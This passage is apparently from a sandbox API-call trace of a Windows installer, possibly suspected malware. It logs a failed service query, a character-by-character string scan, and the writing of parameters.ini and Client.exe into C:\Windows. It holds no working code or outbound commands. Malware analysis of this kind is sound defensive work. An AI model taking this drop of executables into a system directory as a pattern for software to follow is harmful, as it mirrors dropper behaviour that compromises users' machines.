nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x62, lpBytesLeftThisMessage=0x0) returned 1 [0272.352] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x62, lpBytesLeftThisMessage=0x0) returned 1 [0272.352] GetTickCount () returned 0x1d611b1 [0272.352] ReadFile (in: hFile=0x210, lpBuffer=0x2d73078, nNumberOfBytesToRead=0x3ff, lpNumberOfBytesRead=0x2d6fd7c, lpOverlapped=0x0 | out: lpBuffer=0x2d73078*, lpNumberOfBytesRead=0x2d6fd7c*=0x62, lpOverlapped=0x0) returned 1 [0272.352] lstrlenA (lpString="") returned 0 [0272.352] lstrlenA (lpString="[SC] OpenService FAILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n") returned 98 [0272.352] GlobalSize (hMem=0x224003c) returned 0x1000 [0272.352] lstrcatA (in: lpString1="", lpString2="[SC] OpenService FAILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n" | out: lpString1="[SC] OpenService FAILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n") returned="[SC] OpenService FAILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n" [0272.352] lstrlenA (lpString="\x09") returned 1 [0272.352] lstrlenA (lpString="[SC] OpenService FAILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n") returned 98 [0272.352] lstrcmpiA (lpString1="[", lpString2="\x09") returned 1 [0272.353] lstrlenA (lpString="SC] OpenService FAILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n") returned 97 [0272.353] lstrcmpiA (lpString1="S", lpString2="\x09") returned 1 [0272.354] lstrlenA (lpString="C] OpenService FAILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n") returned 96 [0272.354] lstrcmpiA (lpString1="C", lpString2="\x09") returned 1 [0272.354] lstrlenA (lpString="] OpenService FAILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n") returned 95 [0272.354] lstrcmpiA (lpString1="]", lpString2="\x09") returned 1 [0272.354] lstrlenA (lpString=" OpenService FAILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n") returned 94 [0272.354] lstrcmpiA (lpString1=" ", lpString2="\x09") returned -1 [0272.355] lstrlenA (lpString="OpenService FAILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n") returned 93 [0272.355] lstrcmpiA (lpString1="O", lpString2="\x09") returned 1 [0272.355] lstrlenA (lpString="penService FAILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n") returned 92 [0272.355] lstrcmpiA (lpString1="p", lpString2="\x09") returned 1 [0272.355] lstrlenA (lpString="enService FAILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n") returned 91 [0272.355] lstrcmpiA (lpString1="e", lpString2="\x09") returned 1 [0272.356] lstrlenA (lpString="nService FAILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n") returned 90 [0272.356] lstrcmpiA (lpString1="n", lpString2="\x09") returned 1 [0272.356] lstrlenA (lpString="Service FAILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n") returned 89 [0272.356] lstrcmpiA (lpString1="S", lpString2="\x09") returned 1 [0272.356] lstrlenA (lpString="ervice FAILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n") returned 88 [0272.356] lstrcmpiA (lpString1="e", lpString2="\x09") returned 1 [0272.356] lstrlenA (lpString="rvice FAILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n") returned 87 [0272.357] lstrcmpiA (lpString1="r", lpString2="\x09") returned 1 [0272.357] lstrlenA (lpString="vice FAILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n") returned 86 [0272.357] lstrcmpiA (lpString1="v", lpString2="\x09") returned 1 [0272.357] lstrlenA (lpString="ice FAILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n") returned 85 [0272.357] lstrcmpiA (lpString1="i", lpString2="\x09") returned 1 [0272.357] lstrlenA (lpString="ce FAILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n") returned 84 [0272.357] lstrcmpiA (lpString1="c", lpString2="\x09") returned 1 [0272.358] lstrlenA (lpString="e FAILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n") returned 83 [0272.358] lstrcmpiA (lpString1="e", lpString2="\x09") returned 1 [0272.358] lstrlenA (lpString=" FAILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n") returned 82 [0272.358] lstrcmpiA (lpString1=" ", lpString2="\x09") returned -1 [0272.358] lstrlenA (lpString="FAILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n") returned 81 [0272.358] lstrcmpiA (lpString1="F", lpString2="\x09") returned 1 [0272.358] lstrlenA (lpString="AILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n") returned 80 [0272.358] lstrcmpiA (lpString1="A", lpString2="\x09") returned 1 [0272.359] lstrlenA (lpString="ILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n") returned 79 [0272.359] lstrcmpiA (lpString1="I", lpString2="\x09") returned 1 [0272.359] lstrlenA (lpString="LED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n") returned 78 [0272.359] lstrcmpiA (lpString1="L", lpString2="\x09") returned 1 [0272.359] lstrlenA (lpString="ED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n") returned 77 [0272.359] lstrcmpiA (lpString1="E", lpString2="\x09") returned 1 [0272.360] lstrlenA (lpString="D 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n") returned 76 [0272.360] lstrcmpiA (lpString1="D", lpString2="\x09") returned 1 [0272.360] lstrlenA (lpString=" 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n") returned 75 [0272.360] lstrcmpiA (lpString1=" ", lpString2="\x09") returned -1 [0272.360] lstrlenA (lpString="1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n") returned 74 [0272.360] lstrcmpiA (lpString1="1", lpString2="\x09") returned 1 [0272.360] lstrlenA (lpString="060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n") returned 73 [0272.361] lstrcmpiA (lpString1="0", lpString2="\x09") returned 1 [0272.361] lstrlenA (lpString="60:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n") returned 72 [0272.361] lstrcmpiA (lpString1="6", lpString2="\x09") returned 1 [0272.361] lstrlenA (lpString="0:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n") returned 71 [0272.361] lstrcmpiA (lpString1="0", lpString2="\x09") returned 1 [0272.361] lstrlenA (lpString=":\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n") returned 70 [0272.361] lstrcmpiA (lpString1=":", lpString2="\x09") returned 1 [0272.362] lstrlenA (lpString="\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n") returned 69 [0272.362] lstrcmpiA (lpString1="\r", lpString2="\x09") returned 1 [0272.362] lstrlenA (lpString="\n\r\nThe specified service does not exist as an installed service.\r\n\r\n") returned 68 [0272.362] lstrcmpiA (lpString1="\n", lpString2="\x09") returned 1 [0272.362] lstrlenA (lpString="\r\nThe specified service does not exist as an installed service.\r\n\r\n") returned 67 [0272.362] lstrcmpiA (lpString1="\r", lpString2="\x09") returned 1 [0272.363] lstrlenA (lpString="\nThe specified service does not exist as an installed service.\r\n\r\n") returned 66 [0272.363] lstrcmpiA (lpString1="\n", lpString2="\x09") returned 1 [0272.363] lstrlenA (lpString="The specified service does not exist as an installed service.\r\n\r\n") returned 65 [0272.363] lstrcmpiA (lpString1="T", lpString2="\x09") returned 1 [0272.363] lstrlenA (lpString="he specified service does not exist as an installed service.\r\n\r\n") returned 64 [0272.363] lstrcmpiA (lpString1="h", lpString2="\x09") returned 1 [0272.364] lstrlenA (lpString="e specified service does not exist as an installed service.\r\n\r\n") returned 63 [0272.364] lstrcmpiA (lpString1="e", lpString2="\x09") returned 1 [0272.364] lstrlenA (lpString=" specified service does not exist as an installed service.\r\n\r\n") returned 62 [0272.364] lstrcmpiA (lpString1=" ", lpString2="\x09") returned -1 [0272.364] lstrlenA (lpString="specified service does not exist as an installed service.\r\n\r\n") returned 61 [0272.364] lstrcmpiA (lpString1="s", lpString2="\x09") returned 1 [0272.364] lstrlenA (lpString="pecified service does not exist as an installed service.\r\n\r\n") returned 60 [0272.364] lstrcmpiA (lpString1="p", lpString2="\x09") returned 1 [0272.365] lstrlenA (lpString="ecified service does not exist as an installed service.\r\n\r\n") returned 59 [0272.365] lstrcmpiA (lpString1="e", lpString2="\x09") returned 1 [0272.365] lstrlenA (lpString="cified service does not exist as an installed service.\r\n\r\n") returned 58 [0272.365] lstrcmpiA (lpString1="c", lpString2="\x09") returned 1 [0272.365] lstrlenA (lpString="ified service does not exist as an installed service.\r\n\r\n") returned 57 [0272.365] lstrcmpiA (lpString1="i", lpString2="\x09") returned 1 [0272.366] lstrlenA (lpString="fied service does not exist as an installed service.\r\n\r\n") returned 56 [0272.366] lstrcmpiA (lpString1="f", lpString2="\x09") returned 1 [0272.366] lstrlenA (lpString="ied service does not exist as an installed service.\r\n\r\n") returned 55 [0272.366] lstrcmpiA (lpString1="i", lpString2="\x09") returned 1 [0272.366] lstrlenA (lpString="ed service does not exist as an installed service.\r\n\r\n") returned 54 [0272.366] lstrcmpiA (lpString1="e", lpString2="\x09") returned 1 [0272.366] lstrlenA (lpString="d service does not exist as an installed service.\r\n\r\n") returned 53 [0272.366] lstrcmpiA (lpString1="d", lpString2="\x09") returned 1 [0272.367] lstrlenA (lpString=" service does not exist as an installed service.\r\n\r\n") returned 52 [0272.367] lstrcmpiA (lpString1=" ", lpString2="\x09") returned -1 [0272.367] lstrlenA (lpString="service does not exist as an installed service.\r\n\r\n") returned 51 [0272.367] lstrcmpiA (lpString1="s", lpString2="\x09") returned 1 [0272.368] lstrlenA (lpString="ervice does not exist as an installed service.\r\n\r\n") returned 50 [0272.368] lstrcmpiA (lpString1="e", lpString2="\x09") returned 1 [0272.368] lstrlenA (lpString="rvice does not exist as an installed service.\r\n\r\n") returned 49 [0272.368] lstrcmpiA (lpString1="r", lpString2="\x09") returned 1 [0272.368] lstrlenA (lpString="vice does not exist as an installed service.\r\n\r\n") returned 48 [0272.368] lstrcmpiA (lpString1="v", lpString2="\x09") returned 1 [0272.369] lstrlenA (lpString="ice does not exist as an installed service.\r\n\r\n") returned 47 [0272.369] lstrcmpiA (lpString1="i", lpString2="\x09") returned 1 [0272.369] lstrlenA (lpString="ce does not exist as an installed service.\r\n\r\n") returned 46 [0272.369] lstrcmpiA (lpString1="c", lpString2="\x09") returned 1 [0272.369] lstrlenA (lpString="e does not exist as an installed service.\r\n\r\n") returned 45 [0272.369] lstrcmpiA (lpString1="e", lpString2="\x09") returned 1 [0272.369] lstrlenA (lpString=" does not exist as an installed service.\r\n\r\n") returned 44 [0272.369] lstrcmpiA (lpString1=" ", lpString2="\x09") returned -1 [0272.370] lstrlenA (lpString="does not exist as an installed service.\r\n\r\n") returned 43 [0272.370] lstrcmpiA (lpString1="d", lpString2="\x09") returned 1 [0272.370] lstrlenA (lpString="oes not exist as an installed service.\r\n\r\n") returned 42 [0272.370] lstrcmpiA (lpString1="o", lpString2="\x09") returned 1 [0272.370] lstrlenA (lpString="es not exist as an installed service.\r\n\r\n") returned 41 [0272.370] lstrcmpiA (lpString1="e", lpString2="\x09") returned 1 [0272.370] lstrlenA (lpString="s not exist as an installed service.\r\n\r\n") returned 40 [0272.371] lstrcmpiA (lpString1="s", lpString2="\x09") returned 1 [0272.371] lstrlenA (lpString=" not exist as an installed service.\r\n\r\n") returned 39 [0272.371] lstrcmpiA (lpString1=" ", lpString2="\x09") returned -1 [0272.371] lstrlenA (lpString="not exist as an installed service.\r\n\r\n") returned 38 [0272.371] lstrcmpiA (lpString1="n", lpString2="\x09") returned 1 [0272.371] lstrlenA (lpString="ot exist as an installed service.\r\n\r\n") returned 37 [0272.371] lstrcmpiA (lpString1="o", lpString2="\x09") returned 1 [0272.372] lstrlenA (lpString="t exist as an installed service.\r\n\r\n") returned 36 [0272.372] lstrcmpiA (lpString1="t", lpString2="\x09") returned 1 [0272.372] lstrlenA (lpString=" exist as an installed service.\r\n\r\n") returned 35 [0272.372] lstrcmpiA (lpString1=" ", lpString2="\x09") returned -1 [0272.372] lstrlenA (lpString="exist as an installed service.\r\n\r\n") returned 34 [0272.372] lstrcmpiA (lpString1="e", lpString2="\x09") returned 1 [0272.373] lstrlenA (lpString="xist as an installed service.\r\n\r\n") returned 33 [0272.373] lstrcmpiA (lpString1="x", lpString2="\x09") returned 1 [0272.373] lstrlenA (lpString="ist as an installed service.\r\n\r\n") returned 32 [0272.373] lstrcmpiA (lpString1="i", lpString2="\x09") returned 1 [0272.373] lstrlenA (lpString="st as an installed service.\r\n\r\n") returned 31 [0272.373] lstrcmpiA (lpString1="s", lpString2="\x09") returned 1 [0272.373] lstrlenA (lpString="t as an installed service.\r\n\r\n") returned 30 [0272.374] lstrcmpiA (lpString1="t", lpString2="\x09") returned 1 [0272.374] lstrlenA (lpString=" as an installed service.\r\n\r\n") returned 29 [0272.374] lstrcmpiA (lpString1=" ", lpString2="\x09") returned -1 [0272.374] lstrlenA (lpString="as an installed service.\r\n\r\n") returned 28 [0272.374] lstrcmpiA (lpString1="a", lpString2="\x09") returned 1 [0272.374] lstrlenA (lpString="s an installed service.\r\n\r\n") returned 27 [0272.374] lstrcmpiA (lpString1="s", lpString2="\x09") returned 1 [0272.375] lstrlenA (lpString=" an installed service.\r\n\r\n") returned 26 [0272.375] lstrcmpiA (lpString1=" ", lpString2="\x09") returned -1 [0272.375] lstrlenA (lpString="an installed service.\r\n\r\n") returned 25 [0272.375] lstrcmpiA (lpString1="a", lpString2="\x09") returned 1 [0272.375] lstrlenA (lpString="n installed service.\r\n\r\n") returned 24 [0272.375] lstrcmpiA (lpString1="n", lpString2="\x09") returned 1 [0272.375] lstrlenA (lpString=" installed service.\r\n\r\n") returned 23 [0272.375] lstrcmpiA (lpString1=" ", lpString2="\x09") returned -1 [0272.376] lstrlenA (lpString="installed service.\r\n\r\n") returned 22 [0272.376] lstrcmpiA (lpString1="i", lpString2="\x09") returned 1 [0272.376] lstrlenA (lpString="nstalled service.\r\n\r\n") returned 21 [0272.376] lstrcmpiA (lpString1="n", lpString2="\x09") returned 1 [0272.376] lstrlenA (lpString="stalled service.\r\n\r\n") returned 20 [0272.376] lstrcmpiA (lpString1="s", lpString2="\x09") returned 1 [0272.377] lstrlenA (lpString="talled service.\r\n\r\n") returned 19 [0272.377] lstrcmpiA (lpString1="t", lpString2="\x09") returned 1 [0272.377] lstrlenA (lpString="alled service.\r\n\r\n") returned 18 [0272.377] lstrcmpiA (lpString1="a", lpString2="\x09") returned 1 [0272.377] lstrlenA (lpString="lled service.\r\n\r\n") returned 17 [0272.377] lstrcmpiA (lpString1="l", lpString2="\x09") returned 1 [0272.377] lstrlenA (lpString="led service.\r\n\r\n") returned 16 [0272.378] lstrcmpiA (lpString1="l", lpString2="\x09") returned 1 [0272.378] lstrlenA (lpString="ed service.\r\n\r\n") returned 15 [0272.378] lstrcmpiA (lpString1="e", lpString2="\x09") returned 1 [0272.378] lstrlenA (lpString="d service.\r\n\r\n") returned 14 [0272.378] lstrcmpiA (lpString1="d", lpString2="\x09") returned 1 [0272.378] lstrlenA (lpString=" service.\r\n\r\n") returned 13 [0272.378] lstrcmpiA (lpString1=" ", lpString2="\x09") returned -1 [0272.379] lstrlenA (lpString="service.\r\n\r\n") returned 12 [0272.379] lstrcmpiA (lpString1="s", lpString2="\x09") returned 1 [0272.379] lstrlenA (lpString="ervice.\r\n\r\n") returned 11 [0272.379] lstrcmpiA (lpString1="e", lpString2="\x09") returned 1 [0272.379] lstrlenA (lpString="rvice.\r\n\r\n") returned 10 [0272.379] lstrcmpiA (lpString1="r", lpString2="\x09") returned 1 [0272.380] lstrlenA (lpString="vice.\r\n\r\n") returned 9 [0272.380] lstrcmpiA (lpString1="v", lpString2="\x09") returned 1 [0272.380] lstrlenA (lpString="ice.\r\n\r\n") returned 8 [0272.380] lstrcmpiA (lpString1="i", lpString2="\x09") returned 1 [0272.380] lstrlenA (lpString="ce.\r\n\r\n") returned 7 [0272.380] lstrcmpiA (lpString1="c", lpString2="\x09") returned 1 [0272.381] lstrlenA (lpString="e.\r\n\r\n") returned 6 [0272.381] lstrcmpiA (lpString1="e", lpString2="\x09") returned 1 [0272.381] lstrlenA (lpString=".\r\n\r\n") returned 5 [0272.381] lstrcmpiA (lpString1=".", lpString2="\x09") returned 1 [0272.381] lstrlenA (lpString="\r\n\r\n") returned 4 [0272.381] lstrcmpiA (lpString1="\r", lpString2="\x09") returned 1 [0272.382] lstrlenA (lpString="\n\r\n") returned 3 [0272.382] lstrcmpiA (lpString1="\n", lpString2="\x09") returned 1 [0272.382] lstrlenA (lpString="\r\n") returned 2 [0272.382] lstrcmpiA (lpString1="\r", lpString2="\x09") returned 1 [0272.382] lstrlenA (lpString="\n") returned 1 [0272.382] lstrcmpiA (lpString1="\n", lpString2="\x09") returned 1 [0272.385] lstrlenA (lpString="") returned 0 [0272.385] lstrlenA (lpString="[SC] OpenService FAILED 1060:") returned 29 [0272.385] OemToCharBuffA (in: lpszSrc="[SC] OpenService FAILED 1060:", lpszDst=0x2ae820, cchDstLength=0x1d | out: lpszDst="[SC] OpenService FAILED 1060:") returned 1 [0272.385] SendMessageA (hWnd=0x302f8, Msg=0x1004, wParam=0x0, lParam=0x0) returned 0xc [0272.385] SendMessageA (hWnd=0x302f8, Msg=0x1007, wParam=0x0, lParam=0x2d6fb14) returned 0xc [0272.389] SendMessageA (hWnd=0x302f8, Msg=0x1013, wParam=0xc, lParam=0x0) returned 0x1 [0272.391] lstrlenA (lpString="") returned 0 [0272.391] OemToCharBuffA (in: lpszSrc="", lpszDst=0x2ae840, cchDstLength=0x0 | out: lpszDst="") returned 1 [0272.391] SendMessageA (hWnd=0x302f8, Msg=0x1004, wParam=0x0, lParam=0x0) returned 0xd [0272.391] SendMessageA (hWnd=0x302f8, Msg=0x1007, wParam=0x0, lParam=0x2d6fb14) returned 0xd [0272.394] SendMessageA (hWnd=0x302f8, Msg=0x1013, wParam=0xd, lParam=0x0) returned 0x1 [0272.397] lstrlenA (lpString="The specified service does not exist as an installed service.") returned 61 [0272.397] OemToCharBuffA (in: lpszSrc="The specified service does not exist as an installed service.", lpszDst=0x2ae841, cchDstLength=0x3d | out: lpszDst="The specified service does not exist as an installed service.") returned 1 [0272.397] SendMessageA (hWnd=0x302f8, Msg=0x1004, wParam=0x0, lParam=0x0) returned 0xe [0272.397] SendMessageA (hWnd=0x302f8, Msg=0x1007, wParam=0x0, lParam=0x2d6fb14) returned 0xe [0272.400] SendMessageA (hWnd=0x302f8, Msg=0x1013, wParam=0xe, lParam=0x0) returned 0x1 [0272.402] lstrlenA (lpString="") returned 0 [0272.402] OemToCharBuffA (in: lpszSrc="", lpszDst=0x2ae881, cchDstLength=0x0 | out: lpszDst="") returned 1 [0272.402] SendMessageA (hWnd=0x302f8, Msg=0x1004, wParam=0x0, lParam=0x0) returned 0xf [0272.402] SendMessageA (hWnd=0x302f8, Msg=0x1007, wParam=0x0, lParam=0x2d6fb14) returned 0xf [0272.405] SendMessageA (hWnd=0x302f8, Msg=0x1013, wParam=0xf, lParam=0x0) returned 0x1 [0272.406] WaitForSingleObject (hHandle=0x218, dwMilliseconds=0x0) returned 0x102 [0272.407] GetExitCodeProcess (in: hProcess=0x218, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0272.407] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0272.407] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0272.407] Sleep (dwMilliseconds=0x64) [0272.508] WaitForSingleObject (hHandle=0x218, dwMilliseconds=0x0) returned 0x102 [0272.508] GetExitCodeProcess (in: hProcess=0x218, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0272.508] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0272.508] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0272.508] Sleep (dwMilliseconds=0x64) [0272.617] WaitForSingleObject (hHandle=0x218, dwMilliseconds=0x0) returned 0x0 [0272.617] GetExitCodeProcess (in: hProcess=0x218, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x424) returned 1 [0272.617] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0272.617] wsprintfA (in: param_1=0x2d6fc5c, param_2="%d" | out: param_1="1060") returned 4 [0272.617] lstrcpynA (in: lpString1=0x2adbf4, lpString2="1060", iMaxLength=1024 | out: lpString1="1060") returned="1060" [0272.617] CloseHandle (hObject=0x21c) returned 1 [0272.617] CloseHandle (hObject=0x218) returned 1 [0272.617] CloseHandle (hObject=0x214) returned 1 [0272.617] CloseHandle (hObject=0x210) returned 1 [0272.618] CloseHandle (hObject=0x20c) returned 1 [0272.618] CloseHandle (hObject=0x1c) returned 1 [0272.618] GlobalUnlock (hMem=0x224003c) returned 0 [0272.618] FreeLibrary (hLibModule=0x2d70000) returned 1 [0272.619] MulDiv (nNumber=37, nNumerator=30000, nDenominator=60) returned 18500 [0272.619] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x4844, lParam=0x0) returned 0x4650 [0272.626] lstrcpynA (in: lpString1=0x40b010, lpString2="parameters.ini", iMaxLength=1024 | out: lpString1="parameters.ini") returned="parameters.ini" [0272.626] lstrcpynA (in: lpString1=0x40a410, lpString2="C:\\Windows", iMaxLength=1024 | out: lpString1="C:\\Windows") returned="C:\\Windows" [0272.626] lstrlenA (lpString="C:\\Windows") returned 10 [0272.626] lstrcatA (in: lpString1="C:\\Windows", lpString2="\\" | out: lpString1="C:\\Windows\\") returned="C:\\Windows\\" [0272.626] lstrcatA (in: lpString1="C:\\Windows\\", lpString2="parameters.ini" | out: lpString1="C:\\Windows\\parameters.ini") returned="C:\\Windows\\parameters.ini" [0272.627] GetFileAttributesA (lpFileName="C:\\Windows\\parameters.ini" (normalized: "c:\\windows\\parameters.ini")) returned 0xffffffff [0272.627] GetFileAttributesA (lpFileName="C:\\Windows\\parameters.ini" (normalized: "c:\\windows\\parameters.ini")) returned 0xffffffff [0272.627] CreateFileA (lpFileName="C:\\Windows\\parameters.ini" (normalized: "c:\\windows\\parameters.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c [0272.628] lstrcpynA (in: lpString1=0x42a048, lpString2="Extract: ", iMaxLength=1024 | out: lpString1="Extract: ") returned="Extract: " [0272.628] lstrlenA (lpString="Extract: ") returned 9 [0272.628] lstrlenA (lpString="parameters.ini") returned 14 [0272.628] lstrcatA (in: lpString1="Extract: ", lpString2="parameters.ini" | out: lpString1="Extract: parameters.ini") returned="Extract: parameters.ini" [0272.628] SetWindowTextA (hWnd=0x20324, lpString="Extract: parameters.ini") returned 1 [0272.629] SendMessageA (hWnd=0x302f8, Msg=0x1004, wParam=0x0, lParam=0x0) returned 0x10 [0272.630] SendMessageA (hWnd=0x302f8, Msg=0x1007, wParam=0x0, lParam=0x2d6fd70) returned 0x10 [0272.631] SendMessageA (hWnd=0x302f8, Msg=0x1013, wParam=0x10, lParam=0x0) returned 0x1 [0272.633] SetFilePointer (in: hFile=0x1e0, lDistanceToMove=66523, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x103db [0272.633] ReadFile (in: hFile=0x1e0, lpBuffer=0x2d6fdac, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x2d6fdac*, lpNumberOfBytesRead=0x2d6fd28*=0x4, lpOverlapped=0x0) returned 1 [0272.633] GetTickCount () returned 0x1d612ca [0272.633] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0xa9, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0xa9, lpOverlapped=0x0) returned 1 [0272.633] GetTickCount () returned 0x1d612ca [0272.633] MulDiv (nNumber=169, nNumerator=100, nDenominator=169) returned 100 [0272.633] wsprintfA (in: param_1=0x2d6fd44, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0272.633] lstrlenA (lpString="Extract: parameters.ini") returned 23 [0272.633] lstrlenA (lpString="... 100%") returned 8 [0272.634] lstrcatA (in: lpString1="Extract: parameters.ini", lpString2="... 100%" | out: lpString1="Extract: parameters.ini... 100%") returned="Extract: parameters.ini... 100%" [0272.634] SetWindowTextA (hWnd=0x20324, lpString="Extract: parameters.ini... 100%") returned 1 [0272.635] SendMessageA (hWnd=0x302f8, Msg=0x1004, wParam=0x0, lParam=0x0) returned 0x11 [0272.635] SendMessageA (hWnd=0x302f8, Msg=0x1006, wParam=0x0, lParam=0x2d6fcf8) returned 0x1 [0272.635] SendMessageA (hWnd=0x302f8, Msg=0x1013, wParam=0x10, lParam=0x0) returned 0x1 [0272.636] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0xdd, lpOverlapped=0x0) returned 1 [0272.637] SetFileTime (hFile=0x1c, lpCreationTime=0x2d6ff4c, lpLastAccessTime=0x0, lpLastWriteTime=0x2d6ff4c) returned 1 [0272.638] CloseHandle (hObject=0x1c) returned 1 [0272.639] MulDiv (nNumber=38, nNumerator=30000, nDenominator=60) returned 19000 [0272.639] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x4a38, lParam=0x0) returned 0x4844 [0272.640] lstrcpynA (in: lpString1=0x40b010, lpString2="Client.exe", iMaxLength=1024 | out: lpString1="Client.exe") returned="Client.exe" [0272.640] lstrcpynA (in: lpString1=0x40a410, lpString2="C:\\Windows", iMaxLength=1024 | out: lpString1="C:\\Windows") returned="C:\\Windows" [0272.640] lstrlenA (lpString="C:\\Windows") returned 10 [0272.640] lstrcatA (in: lpString1="C:\\Windows", lpString2="\\" | out: lpString1="C:\\Windows\\") returned="C:\\Windows\\" [0272.640] lstrcatA (in: lpString1="C:\\Windows\\", lpString2="Client.exe" | out: lpString1="C:\\Windows\\Client.exe") returned="C:\\Windows\\Client.exe" [0272.641] GetFileAttributesA (lpFileName="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0xffffffff [0272.641] GetFileAttributesA (lpFileName="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0xffffffff [0272.641] CreateFileA (lpFileName="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c [0272.642] lstrcpynA (in: lpString1=0x42a048, lpString2="Extract: ", iMaxLength=1024 | out: lpString1="Extract: ") returned="Extract: " [0272.642] lstrlenA (lpString="Extract: ") returned 9 [0272.642] lstrlenA (lpString="Client.exe") returned 10 [0272.642] lstrcatA (in: lpString1="Extract: ", lpString2="Client.exe" | out: lpString1="Extract: Client.exe") returned="Extract: Client.exe" [0272.642] SetWindowTextA (hWnd=0x20324, lpString="Extract: Client.exe") returned 1 [0272.642] SendMessageA (hWnd=0x302f8, Msg=0x1004, wParam=0x0, lParam=0x0) returned 0x11 [0272.643] 